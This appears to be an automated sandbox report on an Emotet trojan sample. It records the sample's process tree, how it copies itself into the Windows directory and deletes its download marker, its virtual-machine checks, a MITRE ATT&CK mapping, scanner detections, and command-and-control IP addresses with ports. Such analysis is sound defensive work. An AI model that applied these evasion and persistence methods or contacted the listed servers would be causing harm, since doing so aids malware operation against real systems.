Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\vEjGZyD0iN.exe	Process created: C:\Users\user\Desktop\vEjGZyD0iN.exe C:\Users\user\Desktop\vEjGZyD0iN.exe	Jump to behavior
Source: C:\Windows\SysWOW64\appsys.exe	Process created: C:\Windows\SysWOW64\appsys.exe C:\Windows\SysWOW64\appsys.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable	Jump to behavior

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: vEjGZyD0iN.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

Code function: 1_2_013E1F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,

1_2_013E1F40

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\SysWOW64\appsys.exe

Executable created and started: C:\Windows\SysWOW64\appsys.exe

Jump to behavior

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

PE file moved: C:\Windows\SysWOW64\appsys.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

File opened: C:\Windows\SysWOW64\appsys.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)

Show sources

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_1-14795

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

API coverage: 6.5 %

Source: C:\Windows\System32\svchost.exe TID: 5852

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: svchost.exe, 00000003.00000002.212312185.000001DA23540000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.274772639.00000228DBD40000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.469538377.00000208D4940000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.303858097.0000022B1C740000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000008.00000002.471145451.00000282CCE61000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 00000008.00000002.464321746.00000282C7629000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW`S
Source: svchost.exe, 00000008.00000002.471123058.00000282CCE54000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000C.00000002.463798379.00000245D7002000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000003.00000002.212312185.000001DA23540000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.274772639.00000228DBD40000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.469538377.00000208D4940000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.303858097.0000022B1C740000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000003.00000002.212312185.000001DA23540000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.274772639.00000228DBD40000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.469538377.00000208D4940000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.303858097.0000022B1C740000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 0000000C.00000002.463995449.00000245D703C000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.464055973.00000208D3C51000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000002.463906160.00000212AEA29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000003.00000002.212312185.000001DA23540000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.274772639.00000228DBD40000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.469538377.00000208D4940000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.303858097.0000022B1C740000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\appsys.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

Code function: 1_2_013E1F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,

1_2_013E1F40

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

Code function: 1_2_013E1BE0 mov eax, dword ptr fs:[00000030h]

1_2_013E1BE0

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

Code function: 1_2_013E15B0 GetModuleFileNameW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,CreateEventW,CreateMutexW,CloseHandle,GetLastError,SetEvent,CloseHandle,CloseHandle,memset,CreateProcessW,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,CloseHandle,

1_2_013E15B0

Source: svchost.exe, 0000000E.00000002.465582140.0000020B8E790000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: svchost.exe, 0000000E.00000002.465582140.0000020B8E790000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 0000000E.00000002.465582140.0000020B8E790000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: svchost.exe, 0000000E.00000002.465582140.0000020B8E790000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\appsys.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\vEjGZyD0iN.exe

Code function: 1_2_013E8D50 RtlGetVersion,GetNativeSystemInfo,

1_2_013E8D50

Source: C:\Windows\SysWOW64\appsys.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: svchost.exe, 00000012.00000002.463925728.000001866683D000.00000004.00000001.sdmp	Binary or memory string: @\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
Source: svchost.exe, 00000012.00000002.463925728.000001866683D000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: vEjGZyD0iN.exe, type: SAMPLE
Source: Yara match	File source: 00000004.00000000.202803332.00000000013E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.203553485.00000000013E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.464331526.00000000013E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.197038659.00000000013E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.203947277.00000000013E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.196126268.00000000013E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.204289645.00000000013E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 5.0.appsys.exe.13e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.vEjGZyD0iN.exe.13e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.appsys.exe.13e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.vEjGZyD0iN.exe.13e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.vEjGZyD0iN.exe.13e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.appsys.exe.13e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.appsys.exe.13e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.vEjGZyD0iN.exe.13e0000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	DLL Side-Loading1	Process Injection2	Masquerading121	OS Credential Dumping	Security Software Discovery51	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API11	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion3	Security Account Manager	Process Discovery3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection2	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	System Information Discovery24	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
vEjGZyD0iN.exe	83%	Virustotal		Browse
vEjGZyD0iN.exe	97%	ReversingLabs	Win32.Trojan.Emotet
vEjGZyD0iN.exe	100%	Avira	TR/Crypt.XPACK.Gen
vEjGZyD0iN.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.0.appsys.exe.13e0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.vEjGZyD0iN.exe.13e0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.0.appsys.exe.13e0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.vEjGZyD0iN.exe.13e0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.vEjGZyD0iN.exe.13e0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.appsys.exe.13e0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.appsys.exe.13e0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.vEjGZyD0iN.exe.13e0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://79.172.249.82:443/	3%	Virustotal		Browse
https://79.172.249.82:443/	0%	Avira URL Cloud	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://79.172.249.82:443/	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 00000010.00000003.308929719.000001373AA5F000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 00000010.00000003.308982437.000001373AA56000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 00000010.00000002.309324516.000001373AA3C000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 00000010.00000003.308929719.000001373AA5F000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 00000010.00000002.309324516.000001373AA3C000.00000004.00000001.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 00000010.00000003.308939016.000001373AA47000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 00000010.00000002.309324516.000001373AA3C000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/	svchost.exe, 00000010.00000003.287205564.000001373AA30000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 00000010.00000003.308982437.000001373AA56000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 00000010.00000003.308929719.000001373AA5F000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 00000010.00000003.308958861.000001373AA5A000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.308987811.000001373AA40000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 00000010.00000002.309305639.000001373AA24000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.309324516.000001373AA3C000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 00000010.00000002.309331281.000001373AA42000.00000004.00000001.sdmp	false		high
https://%s.xboxlive.com	svchost.exe, 0000000D.00000002.463987902.00000208D3C2A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000010.00000003.287205564.000001373AA30000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 00000010.00000003.308929719.000001373AA5F000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 00000010.00000003.308929719.000001373AA5F000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 00000010.00000003.308958861.000001373AA5A000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 00000010.00000003.287205564.000001373AA30000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 00000010.00000003.308958861.000001373AA5A000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	svchost.exe, 00000008.00000002.470619802.00000282CCC70000.00000002.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 00000010.00000003.287205564.000001373AA30000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 00000010.00000002.309331281.000001373AA42000.00000004.00000001.sdmp	false		high
https://dynamic.t	svchost.exe, 00000010.00000003.308920104.000001373AA62000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.308958861.000001373AA5A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 00000010.00000003.308929719.000001373AA5F000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 00000010.00000003.287205564.000001373AA30000.00000004.00000001.sdmp	false		high
https://appexmapsappupdate.blob.core.windows.net	svchost.exe, 00000010.00000003.308929719.000001373AA5F000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 00000010.00000003.308958861.000001373AA5A000.00000004.00000001.sdmp	false		high
https://activity.windows.com	svchost.exe, 0000000D.00000002.463987902.00000208D3C2A000.00000004.00000001.sdmp	false		high
http://www.bingmapsportal.com	svchost.exe, 00000010.00000002.309305639.000001373AA24000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 00000010.00000003.308929719.000001373AA5F000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 00000010.00000002.309324516.000001373AA3C000.00000004.00000001.sdmp	false		high
https://%s.dnet.xboxlive.com	svchost.exe, 0000000D.00000002.463987902.00000208D3C2A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 00000010.00000003.308958861.000001373AA5A000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
193.169.54.12	unknown	Germany	49464	ICFSYSTEMSDE	false
80.86.91.232	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	false
173.230.145.224	unknown	United States	63949	LINODE-APLinodeLLCUS	false
79.172.249.82	unknown	Hungary	43711	SZERVERNET-HU-ASHU	false

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	386506
Start date:	14.04.2021
Start time:	11:42:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	vEjGZyD0iN (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.evad.winEXE@20/8@0/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 42.3% (good quality ratio 38.7%) Quality average: 79% Quality standard deviation: 30.6%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe Excluded IPs from analysis (whitelisted): 93.184.220.29, 92.122.145.220, 13.88.21.125, 104.42.151.234, 13.64.90.137, 20.50.102.62, 52.255.188.83, 104.76.200.56, 23.32.238.177, 23.32.238.234, 20.54.26.129, 52.147.198.201, 20.82.210.154, 104.43.193.48, 20.82.209.183 Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:43:27	API Interceptor	2x Sleep call for process: svchost.exe modified
11:44:43	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
193.169.54.12	_01_.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	hEHN0WzBF.exe	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	http://baseballpontedipiave.com/Sales-Invoice/	Get hash	malicious	Browse	193.169.54.12:8080/
	emotet2.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	20180212-20_46_01_.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	http://www.yourhabitchangecoach.co.uk/wp-content/Overdue-payment/	Get hash	malicious	Browse	193.169.54.12:8080/
	SalesInvoice.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	SalesInvoice.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	mj03dyvx_2076767.exe	Get hash	malicious	Browse	193.169.54.12:8080/
	Scan1782384.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	Scan1782384.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	RDuYHvb2jQ.exe	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding Invoices.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	http://okomekai.symphonic-net.com/Invoice-69070770/	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding invoice.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	Outstanding invoice.doc	Get hash	malicious	Browse	193.169.54.12:8080/
	mail.rodolfogvalencia.com/Invoice/	Get hash	malicious	Browse	193.169.54.12:8080/
80.86.91.232	Invoice.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Overdue payment.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Emotet.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Outstanding Invoices.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Outstanding Invoices.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Emote.exe	Get hash	malicious	Browse	80.86.91.232:4143/
	Question.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	emotet.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Paypal.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Paypal.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	emotet.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	emotet.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	960-27-621120-257 & 960-27-621120-969.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Rechnung.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	Open invoices.doc	Get hash	malicious	Browse	80.86.91.232:4143/
	20180212-20_46_01_.doc	Get hash	malicious	Browse	80.86.91.232:7080/
	SalesInvoice.doc	Get hash	malicious	Browse	80.86.91.232:7080/
	SalesInvoice.doc	Get hash	malicious	Browse	80.86.91.232:7080/
	mj03dyvx_2076767.exe	Get hash	malicious	Browse	80.86.91.232:7080/
	Scan1782384.doc	Get hash	malicious	Browse	80.86.91.232:7080/

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
